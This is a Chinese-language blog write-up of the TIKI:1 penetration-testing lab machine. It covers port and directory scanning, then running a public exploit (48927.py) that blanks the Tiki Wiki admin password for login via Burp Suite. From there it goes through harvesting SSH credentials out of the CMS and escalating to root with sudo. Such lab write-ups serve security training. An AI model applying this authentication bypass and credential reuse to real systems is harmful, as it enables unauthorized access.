红队渗透靶机:TIKI:1
- IT业界
- 2025-08-04 19:51:02
目录
信息收集
1、arp
2、nmap
3、nikto
4、whatweb
目录探测
1、dirsearch
2、gobuster
WEB
web信息收集
searchsploit
cms信息收集
ssh登录
提权
信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.110.128 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.110.1 00:50:56:c0:00:08 VMware, Inc. 192.168.110.2 00:50:56:ec:d1:ca VMware, Inc. 192.168.110.148 00:50:56:2d:9f:50 VMware, Inc. 192.168.110.254 00:50:56:ff:50:cf VMware, Inc. 5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.371 seconds (107.97 hosts/sec). 4 responded2、nmap 端口探测 ┌──(root㉿ru)-[~/kali] └─# nmap -p- 192.168.110.148 --min-rate 10000 -oA port Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-04 08:56 CST Nmap scan report for 192.168.110.148 Host is up (0.00072s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:50:56:2D:9F:50 (VMware) Nmap done: 1 IP address (1 host up) scanned in 5.82 seconds
信息探测 ┌──(root㉿ru)-[~/kali] └─# nmap -sVC -O -p 22,80,139,445 192.168.110.148 --min-rate 10000 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-04 08:57 CST Nmap scan report for 192.168.110.148 Host is up (0.00055s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 a3:d8:4a:89:a9:25:6d:07:c5:3d:76:28:06:ed:d1:c0 (RSA) | 256 e7:b2:89:05:54:57:dc:02:f4:8c:3a:7c:55:8b:51:aa (ECDSA) |_ 256 fd:77:07:2b:4a:16:3a:01:6b:e0:00:0c:0a:36:d8:2f (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/tiki/ |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.41 (Ubuntu) 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 MAC Address: 00:50:56:2D:9F:50 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: -1s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb2-time: | date: 2024-02-04T00:57:39 |_ start_date: N/A OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds
3、nikto ┌──(root㉿ru)-[~/kali] └─# nikto -h http://192.168.110.148 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 192.168.110.148 + Target Hostname: 192.168.110.148 + Target Port: 80 + Start Time: 2024-02-04 08:59:43 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + No CGI Directories found (use '-C all' to force check all possible dirs) + /tiki/: Cookie javascript_enabled_detect created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies + /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt + Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. + /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5ab91fa8e8bd0, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418 + OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD . + /tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin. + 8103 requests: 0 error(s) and 8 item(s) reported on remote host + End Time: 2024-02-04 09:00:02 (GMT8) (19 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
4、whatweb ┌──(root㉿ru)-[~/kali] └─# whatweb http://192.168.110.148/ http://192.168.110.148/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.110.148], Title[Apache2 Ubuntu Default Page: It works]
目录探测 1、dirsearch ┌──(root㉿ru)-[~/kali] └─# dirsearch -u http://192.168.110.148 -e* -x 403 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594 Output File: /root/kali/reports/http_192.168.110.148/_24-02-04_09-02-38.txt Target: http://192.168.110.148/ [09:02:38] Starting: [09:03:27] 200 - 42B - /robots.txt [09:03:40] 301 - 317B - /tiki -> http://192.168.110.148/tiki/ [09:03:40] 200 - 526B - /tiki/doc/stable.version Task Completed
2、gobuster ┌──(root㉿ru)-[~/kali] └─# gobuster dir -u http://192.168.110.148/ -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.110.148/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,txt,html [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.php (Status: 403) [Size: 280] /.html (Status: 403) [Size: 280] /index.html (Status: 200) [Size: 10918] /robots.txt (Status: 200) [Size: 42] /tiki (Status: 301) [Size: 317] [--> http://192.168.110.148/tiki/] /.php (Status: 403) [Size: 280] /.html (Status: 403) [Size: 280] /server-status (Status: 403) [Size: 280] Progress: 882240 / 882244 (100.00%) =============================================================== Finished ===============================================================
WEB web信息收集
经过robots.txt的提示,我们找到一个cms!但是没有用户名和密码!
在源码中可以找到cms的全称!Tiki Wiki CMS Groupware
searchsploit searchsploit Tiki Wiki CMS Groupware
使用searchsploit搜索发现存在漏洞!而且有很多利用漏洞!第二个是身份验证绕过!我们尝试一下!
我们下载到本地!利用!
┌──(root㉿ru)-[~/kali] └─# python3 48927.py 192.168.110.148 Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password Admin Password got removed. Use BurpSuite to login into admin without a password
这个漏洞是攻击者能够暴力破解 Tiki Wiki 管理员帐户,直到在 50 次无效登录尝试后该帐户被锁定。然后攻击者可以使用空密码进行管理员身份验证并获得完整的帐户访问权限。 网页不允许我们将密码字段留空,但 Burpsuite 可以,所以这就是它的用武之地。然后我们可以在浏览器中显示响应,我们以管理员身份登录。
直接抓取登陆包!然后把密码置空,就可以登录成功!
cms信息收集
点击!
同理,我们点击这个!
silky:Agy8Y7SPJNXQzqA 得到用户名以及密码!我们尝试ssh登录!
ssh登录 ┌──(root㉿ru)-[~/kali] └─# ssh silky@192.168.110.148 The authenticity of host '192.168.110.148 (192.168.110.148)' can't be established. ED25519 key fingerprint is SHA256:XflXXBfe5SUYLsljbJnki2yJdH6w++09xXrSiLwKWc4. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.110.148' (ED25519) to the list of known hosts. silky@192.168.110.148's password: Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-42-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 1 Aktualisierung kann sofort installiert werden. 0 dieser Aktualisierung sind Sicherheitsaktualisierungen. Um zu sehen, wie diese zusätzlichen Updates ausgeführt werden: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Your Hardware Enablement Stack (HWE) is supported until April 2025. Last login: Fri Jul 31 09:50:24 2020 from 192.168.56.1 silky@ubuntu:~$ id uid=1000(silky) gid=1000(silky) Gruppen=1000(silky),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare) silky@ubuntu:~$
提权 silky@ubuntu:~$ sudo -l [sudo] Passwort für silky: Passende Defaults-Einträge für silky auf ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen: (ALL : ALL) ALL silky@ubuntu:~$ sudo su root@ubuntu:/home/silky# id uid=0(root) gid=0(root) Gruppen=0(root) root@ubuntu:/home/silky#
root@ubuntu:/home/silky# cd /root root@ubuntu:~# ls flag.txt root@ubuntu:~# cat flag.txt ██████╗ ██████╗ ███╗ ██╗ ██████╗ ██████╗ █████╗ ████████╗██╗ ██╗██╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗███████╗██╗ ██╔════╝██╔═══██╗████╗ ██║██╔════╝ ██╔══██╗██╔══██╗╚══██╔══╝██║ ██║██║ ██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║██╔════╝██║ ██║ ██║ ██║██╔██╗ ██║██║ ███╗██████╔╝███████║ ██║ ██║ ██║██║ ███████║ ██║ ██║██║ ██║██╔██╗ ██║███████╗██║ ██║ ██║ ██║██║╚██╗██║██║ ██║██╔══██╗██╔══██║ ██║ ██║ ██║██║ ██╔══██║ ██║ ██║██║ ██║██║╚██╗██║╚════██║╚═╝ ╚██████╗╚██████╔╝██║ ╚████║╚██████╔╝██║ ██║██║ ██║ ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║███████║██╗ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝╚═╝ You did it ^^ I hope you had fun. Share your flag with me on Twitter: S1lky_1337 flag:88d8120f434c3b4221937a8cd0668588 root@ubuntu:~#
红队渗透靶机:TIKI:1由讯客互联IT业界栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“红队渗透靶机:TIKI:1”
